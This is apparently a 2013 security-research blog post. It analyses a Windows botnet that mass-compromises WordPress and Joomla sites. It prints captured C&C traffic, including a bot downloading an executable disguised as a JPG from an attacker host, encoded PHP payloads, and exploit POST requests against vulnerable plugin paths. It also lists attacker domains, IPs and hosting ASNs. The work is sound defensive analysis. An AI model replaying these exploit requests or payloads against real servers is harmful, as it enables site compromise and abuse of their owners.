Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan  (Mutopy  - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2.  Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with domain www.wholists.org 

Unpacked version of conhost.exe  7958F73DAF4B84E3B00E008258EA2E7A contains Base94 alphabet, which is being used for encoding strings and communication requests in addition to common Base64

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3.  Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php 
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

There were several PHP scripts observed being downloaded from 46.165.230.185.  These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server.  We link here to the PHP scripts we saw in use this malware.  The presence of any of these scripts on a CMS webserver is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits.  After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads.  By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt.  Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures.  The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encoded
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.






POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive



Hosting Infrastructure 

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure


Domain IP Address ASN Network Name
wholists.org 95.163.104.69 AS12695 Digital Networks CJSC
gettrial.store-apps.org 95.163.104.94 AS12695 Digital Networks CJSC
t22.run-stat.org 95.163.104.69 AS12695 Digital Networks CJSC
seek4.run-stat.org 46.165.230.185 AS16265 Leaseweb
bt.ads-runner.org 208.115.109.53 AS23033 Wowrack
fw.point-up.org 85.143.166.221 AS56534 PIRIX-CORPNET-2


Passive DNS

95.163.104.69 95.163.104.94 46.165.230.185 208.115.109.5385.143.166.221
www.wholists.org ns1.wholists.org ns1.upsave.info ntp.run-stat.orgfw.point-up.org
bns.wholists.org ns1.store-apps.org fw.stat-run.info bt.ads-runner.orgns2.memrem.ru
gjd.wholists.org ns1.games-olympic.org fw.run-stat.org sk4.ads-runner.orgns2.nalkanet.ru
lbh.wholists.org ns1.googleminiapi.com mail.stat-run.info ntp.stat-run.infons2.nallanite.ru
qdp.wholists.org peace.vijproject.com bt2.run-stat.org
vm.clodoserver.ru
www.techsign.org sogood.vitaminavip.com jc.upsave.info

ml.inviteyou.info img.stat-run.info ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 &  95.163.104.94- ASN12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013














In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack



Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013













For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2


Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013
















In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534